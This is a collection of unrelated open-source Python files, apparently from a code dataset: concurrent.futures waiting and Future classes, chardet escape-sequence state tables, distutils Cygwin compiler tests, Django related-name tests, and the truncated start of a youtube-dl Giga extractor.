    if return_when == _AS_COMPLETED:
        waiter = _AsCompletedWaiter()
    elif return_when == FIRST_COMPLETED:
        waiter = _FirstCompletedWaiter()
    elif return_when in (FIRST_EXCEPTION, ALL_COMPLETED):
        # Both conditions need an exact count of futures still outstanding.
        pending = sum(f._state not in [CANCELLED_AND_NOTIFIED, FINISHED]
                      for f in fs)
        waiter = _AllCompletedWaiter(
            pending, stop_on_exception=(return_when == FIRST_EXCEPTION))
    else:
        raise ValueError("Invalid return condition: %r" % return_when)
    for f in fs:
        f._waiters.append(waiter)
    return waiter
def as_completed(fs, timeout=None):
    """An iterator over the given futures that yields each as it completes.

    Args:
        fs: The sequence of Futures (possibly created by different Executors) to
            iterate over.
        timeout: The maximum number of seconds to wait. If None, then there
            is no limit on the wait time.

    Returns:
        An iterator that yields the given Futures as they complete (finished or
        cancelled).

    Raises:
        TimeoutError: If the entire result iterator could not be generated
            before the given timeout.
    """
    if timeout is not None:
        end_time = timeout + time.time()
    with _AcquireFutures(fs):
        # Snapshot finished/pending and install the waiter while every
        # future's condition is held, so no completion can slip between the
        # snapshot and the waits below.
        finished = set(
                f for f in fs
                if f._state in [CANCELLED_AND_NOTIFIED, FINISHED])
        pending = set(fs) - finished
        waiter = _create_and_install_waiters(fs, _AS_COMPLETED)
    try:
        for future in finished:
            yield future
        while pending:
            if timeout is None:
                wait_timeout = None
            else:
                # Remaining budget until the caller's absolute deadline.
                wait_timeout = end_time - time.time()
                if wait_timeout < 0:
                    raise TimeoutError(
                            '%d (of %d) futures unfinished' % (
                            len(pending), len(fs)))
            waiter.event.wait(wait_timeout)
            # Drain the completions accumulated so far under the waiter's
            # lock, and reset the event for the next round.
            with waiter.lock:
                finished = waiter.finished_futures
                waiter.finished_futures = []
                waiter.event.clear()
            for future in finished:
                yield future
                pending.remove(future)
    finally:
        # Detach the waiter even if the caller abandons the generator or a
        # timeout fires, so futures do not keep stale waiter references.
        for f in fs:
            f._waiters.remove(waiter)
# Return type of wait(): the futures already done and those still pending.
DoneAndNotDoneFutures = namedtuple(
    'DoneAndNotDoneFutures', 'done not_done')
def wait(fs, timeout=None, return_when=ALL_COMPLETED):
    """Wait for the futures in the given sequence to complete.

    Args:
        fs: The sequence of Futures (possibly created by different Executors) to
            wait upon.
        timeout: The maximum number of seconds to wait. If None, then there
            is no limit on the wait time.
        return_when: Indicates when this function should return. The options
            are:

            FIRST_COMPLETED - Return when any future finishes or is
                              cancelled.
            FIRST_EXCEPTION - Return when any future finishes by raising an
                              exception. If no future raises an exception
                              then it is equivalent to ALL_COMPLETED.
            ALL_COMPLETED - Return when all futures finish or are cancelled.

    Returns:
        A named 2-tuple of sets. The first set, named 'done', contains the
        futures that completed (is finished or cancelled) before the wait
        completed. The second set, named 'not_done', contains uncompleted
        futures.
    """
    with _AcquireFutures(fs):
        # Decide under all futures' conditions whether the requested
        # condition is already satisfied; otherwise install a waiter before
        # releasing the locks, so no completion can be missed.
        done = set(f for f in fs
                   if f._state in [CANCELLED_AND_NOTIFIED, FINISHED])
        not_done = set(fs) - done
        if (return_when == FIRST_COMPLETED) and done:
            return DoneAndNotDoneFutures(done, not_done)
        elif (return_when == FIRST_EXCEPTION) and done:
            if any(f for f in done
                   if not f.cancelled() and f.exception() is not None):
                return DoneAndNotDoneFutures(done, not_done)
        if len(done) == len(fs):
            return DoneAndNotDoneFutures(done, not_done)
        waiter = _create_and_install_waiters(fs, return_when)
    # Block until the waiter's condition is met or the timeout elapses;
    # on timeout the partial result is returned, not raised.
    waiter.event.wait(timeout)
    for f in fs:
        f._waiters.remove(waiter)
    done.update(waiter.finished_futures)
    return DoneAndNotDoneFutures(done, set(fs) - done)
class Future(object):
    """Represents the result of an asynchronous computation."""

    def __init__(self):
        """Initializes the future. Should not be called by clients."""
        self._condition = threading.Condition()
        self._state = PENDING
        self._result = None
        self._exception = None
        self._waiters = []
        self._done_callbacks = []

    def _invoke_callbacks(self):
        # Callbacks run in whichever thread completes or cancels the future;
        # exceptions are logged rather than propagated so one bad callback
        # cannot break completion handling.
        for callback in self._done_callbacks:
            try:
                callback(self)
            except Exception:
                LOGGER.exception('exception calling callback for %r', self)

    def __repr__(self):
        with self._condition:
            if self._state == FINISHED:
                if self._exception:
                    return '<Future at %s state=%s raised %s>' % (
                        hex(id(self)),
                        _STATE_TO_DESCRIPTION_MAP[self._state],
                        self._exception.__class__.__name__)
                else:
                    return '<Future at %s state=%s returned %s>' % (
                        hex(id(self)),
                        _STATE_TO_DESCRIPTION_MAP[self._state],
                        self._result.__class__.__name__)
            return '<Future at %s state=%s>' % (
                hex(id(self)),
                _STATE_TO_DESCRIPTION_MAP[self._state])

    def cancel(self):
        """Cancel the future if possible.

        Returns True if the future was cancelled, False otherwise. A future
        cannot be cancelled if it is running or has already completed.
        """
        with self._condition:
            if self._state in [RUNNING, FINISHED]:
                return False
            if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
                return True
            self._state = CANCELLED
            self._condition.notify_all()
        # Callbacks are invoked outside the condition to avoid running
        # arbitrary user code while holding the lock.
        self._invoke_callbacks()
        return True

    def cancelled(self):
        """Return True if the future has cancelled."""
        with self._condition:
            return self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]

    def running(self):
        """Return True if the future is currently executing."""
        with self._condition:
            return self._state == RUNNING

    def done(self):
        """Return True of the future was cancelled or finished executing."""
        with self._condition:
            return self._state in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]

    def __get_result(self):
        # Caller must hold self._condition and have verified state FINISHED.
        if self._exception:
            raise self._exception
        else:
            return self._result

    def add_done_callback(self, fn):
        """Attaches a callable that will be called when the future finishes.

        Args:
            fn: A callable that will be called with this future as its only
                argument when the future completes or is cancelled. The callable
                will always be called by a thread in the same process in which
                it was added. If the future has already completed or been
                cancelled then the callable will be called immediately. These
                callables are called in the order that they were added.
        """
        with self._condition:
            if self._state not in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]:
                self._done_callbacks.append(fn)
                return
        # Already done: invoke immediately, outside the lock.
        fn(self)

    def result(self, timeout=None):
        """Return the result of the call that the future represents.

        Args:
            timeout: The number of seconds to wait for the result if the future
                isn't done. If None, then there is no limit on the wait time.

        Returns:
            The result of the call that the future represents.

        Raises:
            CancelledError: If the future was cancelled.
            TimeoutError: If the future didn't finish executing before the given
                timeout.
            Exception: If the call raised then that exception will be raised.
        """
        with self._condition:
            if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
                raise CancelledError()
            elif self._state == FINISHED:
                return self.__get_result()
            self._condition.wait(timeout)
            # Re-check after the wait: it may have returned on notify or on
            # timeout, so the state decides which outcome applies.
            if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
                raise CancelledError()
            elif self._state == FINISHED:
                return self.__get_result()
            else:
                raise TimeoutError()

    def exception(self, timeout=None):
        """Return the exception raised by the call that the future represents.

        Args:
            timeout: The number of seconds to wait for the exception if the
                future isn't done. If None, then there is no limit on the wait
                time.

        Returns:
            The exception raised by the call that the future represents or None
            if the call completed without raising.

        Raises:
            CancelledError: If the future was cancelled.
            TimeoutError: If the future didn't finish executing before the given
                timeout.
        """
        with self._condition:
            if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
                raise CancelledError()
            elif self._state == FINISHED:
                return self._exception
            self._condition.wait(timeout)
            if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
                raise CancelledError()
            elif self._state == FINISHED:
                return self._exception
            else:
                raise TimeoutError()

    # The following methods should only be used by Executors and in tests.
    def set_running_or_notify_cancel(self):
        """Mark the future as running or process any cancel notifications.

        Should only be used by Executor implementations and unit tests.

        If the future has been cancelled (cancel() was called and returned
        True) then any threads waiting on the future completing (though calls
        to as_completed() or wait()) are notified and False is returned.

        If the future was not cancelled then it is put in the running state
        (future calls to running() will return True) and True is returned.

        This method should be called by Executor implementations before
        executing the work associated with this future. If this method returns
        False then the work should not be executed.

        Returns:
            False if the Future was cancelled, True otherwise.

        Raises:
            RuntimeError: if this method was already called or if set_result()
                or set_exception() was called.
        """
        with self._condition:
            if self._state == CANCELLED:
                self._state = CANCELLED_AND_NOTIFIED
                for waiter in self._waiters:
                    waiter.add_cancelled(self)
                # self._condition.notify_all() is not necessary because
                # self.cancel() triggers a notification.
                return False
            elif self._state == PENDING:
                self._state = RUNNING
                return True
            else:
                # Bug fix: this previously logged self.future, an attribute
                # that does not exist on Future, so reaching this branch
                # raised AttributeError instead of reporting the bad state.
                LOGGER.critical('Future %s in unexpected state: %s',
                                id(self),
                                self._state)
                raise RuntimeError('Future in unexpected state')

    def set_result(self, result):
        """Sets the return value of work associated with the future.

        Should only be used by Executor implementations and unit tests.
        """
        with self._condition:
            self._result = result
            self._state = FINISHED
            for waiter in self._waiters:
                waiter.add_result(self)
            self._condition.notify_all()
        self._invoke_callbacks()

    def set_exception(self, exception):
        """Sets the result of the future as being the given exception.

        Should only be used by Executor implementations and unit tests.
        """
        with self._condition:
            self._exception = exception
            self._state = FINISHED
            for waiter in self._waiters:
                waiter.add_exception(self)
            self._condition.notify_all()
        self._invoke_callbacks()
class Executor(object):
    """This is an abstract base class for concrete asynchronous executors."""

    def submit(self, fn, *args, **kwargs):
        """Submits a callable to be executed with the given arguments.

        Schedules the callable to be executed as fn(*args, **kwargs) and returns
        a Future instance representing the execution of the callable.

        Returns:
            A Future representing the given call.
        """
        raise NotImplementedError()

    def map(self, fn, *iterables, **kwargs):
        """Returns a iterator equivalent to map(fn, iter).

        Args:
            fn: A callable that will take as many arguments as there are
                passed iterables.
            timeout: The maximum number of seconds to wait. If None, then there
                is no limit on the wait time.

        Returns:
            An iterator equivalent to: map(func, *iterables) but the calls may
            be evaluated out-of-order.

        Raises:
            TimeoutError: If the entire result iterator could not be generated
                before the given timeout.
            Exception: If fn(*args) raises for any values.
        """
        # timeout is taken from kwargs because Python 2 cannot express
        # keyword-only arguments syntactically.
        timeout = kwargs.get('timeout')
        if timeout is not None:
            end_time = timeout + time.time()
        # All calls are submitted up front (once iteration begins); results
        # are then yielded lazily in submission order.
        fs = [self.submit(fn, *args) for args in zip(*iterables)]
        try:
            for future in fs:
                if timeout is None:
                    yield future.result()
                else:
                    # Each result gets whatever remains of the overall budget.
                    yield future.result(end_time - time.time())
        finally:
            # Reached on timeout, error, or when the caller abandons the
            # iterator: cancel whatever has not started running yet.
            for future in fs:
                future.cancel()

    def shutdown(self, wait=True):
        """Clean-up the resources associated with the Executor.

        It is safe to call this method several times. Otherwise, no other
        methods can be called after this one.

        Args:
            wait: If True then shutdown will not return until all running
                futures have finished executing and the resources used by the
                executor have been reclaimed.
        """
        pass

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.shutdown(wait=True)
        return False
| gpl-3.0 |
anakinsolo/backend | Lib/site-packages/pip/_vendor/requests/packages/chardet/escsm.py | 2930 | 7839 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
HZ_cls = (
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
)
HZ_st = (
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
)
HZCharLenTable = (0, 0, 0, 0, 0, 0)
# State-machine description bundle: 'classTable' maps each input byte to one
# of 'classFactor' byte classes, 'stateTable' (indexed by
# state * classFactor + class) drives the transitions, and 'charLenTable'
# gives a per-state character length hint.
# NOTE(review): field semantics inferred from the table shapes here --
# confirm against the escaped-charset state machine implementation.
HZSMModel = {'classTable': HZ_cls,
             'classFactor': 6,
             'stateTable': HZ_st,
             'charLenTable': HZCharLenTable,
             'name': "HZ-GB-2312"}
ISO2022CN_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022CN_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
)
ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0)
# Same bundle structure as HZSMModel above, for the ISO-2022-CN escape
# sequences (9 byte classes).
ISO2022CNSMModel = {'classTable': ISO2022CN_cls,
                    'classFactor': 9,
                    'stateTable': ISO2022CN_st,
                    'charLenTable': ISO2022CNCharLenTable,
                    'name': "ISO-2022-CN"}
ISO2022JP_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022JP_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
)
ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
# Same bundle structure as HZSMModel above, for the ISO-2022-JP escape
# sequences (10 byte classes).
ISO2022JPSMModel = {'classTable': ISO2022JP_cls,
                    'classFactor': 10,
                    'stateTable': ISO2022JP_st,
                    'charLenTable': ISO2022JPCharLenTable,
                    'name': "ISO-2022-JP"}
ISO2022KR_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022KR_st = (
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
)
ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0)
# Same bundle structure as HZSMModel above, for the ISO-2022-KR escape
# sequences (6 byte classes).
ISO2022KRSMModel = {'classTable': ISO2022KR_cls,
                    'classFactor': 6,
                    'stateTable': ISO2022KR_st,
                    'charLenTable': ISO2022KRCharLenTable,
                    'name': "ISO-2022-KR"}
# flake8: noqa
| mit |
cnsoft/kbengine-cocos2dx | kbe/res/scripts/common/Lib/distutils/tests/test_cygwinccompiler.py | 147 | 5671 | """Tests for distutils.cygwinccompiler."""
import unittest
import sys
import os
from io import BytesIO
import subprocess
from test.support import run_unittest
from distutils import cygwinccompiler
from distutils.cygwinccompiler import (CygwinCCompiler, check_config_h,
CONFIG_H_OK, CONFIG_H_NOTOK,
CONFIG_H_UNCERTAIN, get_versions,
get_msvcr)
from distutils.tests import support
class FakePopen(object):
    """Test double for subprocess.Popen.

    Serves canned stdout bytes for executables registered in the owning
    test case's ``_exes`` mapping and falls back to ``os.popen`` for
    anything unknown.
    """
    # The test case instance that owns this fake (supplies ``_exes``).
    test_class = None

    def __init__(self, cmd, shell, stdout):
        executable = cmd.split()[0]
        self.cmd = executable
        canned = self.test_class._exes
        try:
            # issue #6438 in Python 3.x, Popen returns bytes
            self.stdout = BytesIO(canned[executable])
        except KeyError:
            self.stdout = os.popen(cmd, 'r')
class CygwinCCompilerTestCase(support.TempdirManager,
                              unittest.TestCase):
    """Tests for distutils.cygwinccompiler helpers.

    setUp monkey-patches sysconfig.get_config_h_filename,
    cygwinccompiler.find_executable and cygwinccompiler.Popen so the tests
    never touch the real toolchain; tearDown restores all of them.
    """
    def setUp(self):
        super(CygwinCCompilerTestCase, self).setUp()
        # several tests mutate sys.version; remember it for tearDown
        self.version = sys.version
        self.python_h = os.path.join(self.mkdtemp(), 'python.h')
        from distutils import sysconfig
        self.old_get_config_h_filename = sysconfig.get_config_h_filename
        sysconfig.get_config_h_filename = self._get_config_h_filename
        self.old_find_executable = cygwinccompiler.find_executable
        cygwinccompiler.find_executable = self._find_executable
        # maps executable name -> canned stdout bytes served by FakePopen
        self._exes = {}
        self.old_popen = cygwinccompiler.Popen
        FakePopen.test_class = self
        cygwinccompiler.Popen = FakePopen
    def tearDown(self):
        # restore everything setUp patched
        sys.version = self.version
        from distutils import sysconfig
        sysconfig.get_config_h_filename = self.old_get_config_h_filename
        cygwinccompiler.find_executable = self.old_find_executable
        cygwinccompiler.Popen = self.old_popen
        super(CygwinCCompilerTestCase, self).tearDown()
    def _get_config_h_filename(self):
        # stand-in for sysconfig.get_config_h_filename
        return self.python_h
    def _find_executable(self, name):
        # stand-in for find_executable: only knows executables in self._exes
        if name in self._exes:
            return name
        return None
    def test_check_config_h(self):
        # check_config_h looks for "GCC" in sys.version first
        # returns CONFIG_H_OK if found
        sys.version = ('2.6.1 (r261:67515, Dec 6 2008, 16:42:21) \n[GCC '
                       '4.0.1 (Apple Computer, Inc. build 5370)]')
        self.assertEqual(check_config_h()[0], CONFIG_H_OK)
        # then it tries to see if it can find "__GNUC__" in pyconfig.h
        sys.version = 'something without the *CC word'
        # if the file doesn't exist it returns CONFIG_H_UNCERTAIN
        self.assertEqual(check_config_h()[0], CONFIG_H_UNCERTAIN)
        # if it exists but does not contain __GNUC__, it returns CONFIG_H_NOTOK
        self.write_file(self.python_h, 'xxx')
        self.assertEqual(check_config_h()[0], CONFIG_H_NOTOK)
        # and CONFIG_H_OK if __GNUC__ is found
        self.write_file(self.python_h, 'xxx __GNUC__ xxx')
        self.assertEqual(check_config_h()[0], CONFIG_H_OK)
    def test_get_versions(self):
        # get_versions calls distutils.spawn.find_executable on
        # 'gcc', 'ld' and 'dllwrap'
        self.assertEqual(get_versions(), (None, None, None))
        # Let's fake we have 'gcc' and it returns '3.4.5'
        self._exes['gcc'] = b'gcc (GCC) 3.4.5 (mingw special)\nFSF'
        res = get_versions()
        self.assertEqual(str(res[0]), '3.4.5')
        # and let's see what happens when the version
        # doesn't match the regular expression
        # (\d+\.\d+(\.\d+)*)
        self._exes['gcc'] = b'very strange output'
        res = get_versions()
        self.assertEqual(res[0], None)
        # same thing for ld
        self._exes['ld'] = b'GNU ld version 2.17.50 20060824'
        res = get_versions()
        self.assertEqual(str(res[1]), '2.17.50')
        self._exes['ld'] = b'@(#)PROGRAM:ld PROJECT:ld64-77'
        res = get_versions()
        self.assertEqual(res[1], None)
        # and dllwrap
        self._exes['dllwrap'] = b'GNU dllwrap 2.17.50 20060824\nFSF'
        res = get_versions()
        self.assertEqual(str(res[2]), '2.17.50')
        self._exes['dllwrap'] = b'Cheese Wrap'
        res = get_versions()
        self.assertEqual(res[2], None)
    def test_get_msvcr(self):
        # get_msvcr maps the "[MSC v.NNNN ...]" marker in sys.version to
        # the matching msvcr runtime library name
        # none
        sys.version = ('2.6.1 (r261:67515, Dec 6 2008, 16:42:21) '
                       '\n[GCC 4.0.1 (Apple Computer, Inc. build 5370)]')
        self.assertEqual(get_msvcr(), None)
        # MSVC 7.0
        sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
                       '[MSC v.1300 32 bits (Intel)]')
        self.assertEqual(get_msvcr(), ['msvcr70'])
        # MSVC 7.1
        sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
                       '[MSC v.1310 32 bits (Intel)]')
        self.assertEqual(get_msvcr(), ['msvcr71'])
        # VS2005 / MSVC 8.0
        sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
                       '[MSC v.1400 32 bits (Intel)]')
        self.assertEqual(get_msvcr(), ['msvcr80'])
        # VS2008 / MSVC 9.0
        sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
                       '[MSC v.1500 32 bits (Intel)]')
        self.assertEqual(get_msvcr(), ['msvcr90'])
        # unknown
        sys.version = ('2.5.1 (r251:54863, Apr 18 2007, 08:51:08) '
                       '[MSC v.1999 32 bits (Intel)]')
        self.assertRaises(ValueError, get_msvcr)
def test_suite():
    """Assemble the suite of cygwinccompiler tests for run_unittest."""
    suite = unittest.makeSuite(CygwinCCompilerTestCase)
    return suite
# Allow running this test module directly as a script.
if __name__ == '__main__':
    run_unittest(test_suite())
| lgpl-3.0 |
benjaminrigaud/django | tests/model_options/test_default_related_name.py | 41 | 1645 | from django.test import TestCase
from .models.default_related_name import Author, Editor, Book
class DefaultRelatedNameTests(TestCase):
    """Exercise Meta.default_related_name on the related test models:
    absence, presence, explicit related_name override, and inheritance."""
    def setUp(self):
        # editor references author and book references editor, so the
        # creation order below matters
        self.author = Author.objects.create(first_name="Dave", last_name="Loper")
        self.editor = Editor.objects.create(name="Test Editions",
                                            bestselling_author=self.author)
        self.book = Book.objects.create(title="Test Book", editor=self.editor)
        self.book.authors.add(self.author)
        self.book.save()
    def test_no_default_related_name(self):
        # without default_related_name the reverse accessor is <model>_set
        try:
            self.author.editor_set
        except AttributeError:
            self.fail("Author should have an editor_set relation.")
    def test_default_related_name(self):
        try:
            self.author.books
        except AttributeError:
            self.fail("Author should have a books relation.")
    def test_related_name_overrides_default_related_name(self):
        try:
            self.editor.edited_books
        except AttributeError:
            self.fail("Editor should have a edited_books relation.")
    def test_inheritance(self):
        try:
            # Here model_options corresponds to the name of the application used
            # in this test
            self.book.model_options_bookstores
        except AttributeError:
            self.fail("Book should have a model_options_bookstores relation.")
    def test_inheritance_with_overrided_default_related_name(self):
        try:
            self.book.editor_stores
        except AttributeError:
            self.fail("Book should have a editor_stores relation.")
| bsd-3-clause |
unreal666/youtube-dl | youtube_dl/extractor/giga.py | 64 | 3820 | # coding: utf-8
from __future__ import unicode_literals
import itertools
from .common import InfoExtractor
from ..utils import (
qualities,
compat_str,
parse_duration,
parse_iso8601,
str_to_int,
)
class GigaIE(InfoExtractor):
    """Extractor for videos hosted on giga.de.

    Scrapes the page for a numeric video id, fetches the playlist JSON
    from giga's syndication API and assembles formats plus metadata.
    """
    _VALID_URL = r'https?://(?:www\.)?giga\.de/(?:[^/]+/)*(?P<id>[^/]+)'
    _TESTS = [{
        'url': 'http://www.giga.de/filme/anime-awesome/trailer/anime-awesome-chihiros-reise-ins-zauberland-das-beste-kommt-zum-schluss/',
        'md5': '6bc5535e945e724640664632055a584f',
        'info_dict': {
            'id': '2622086',
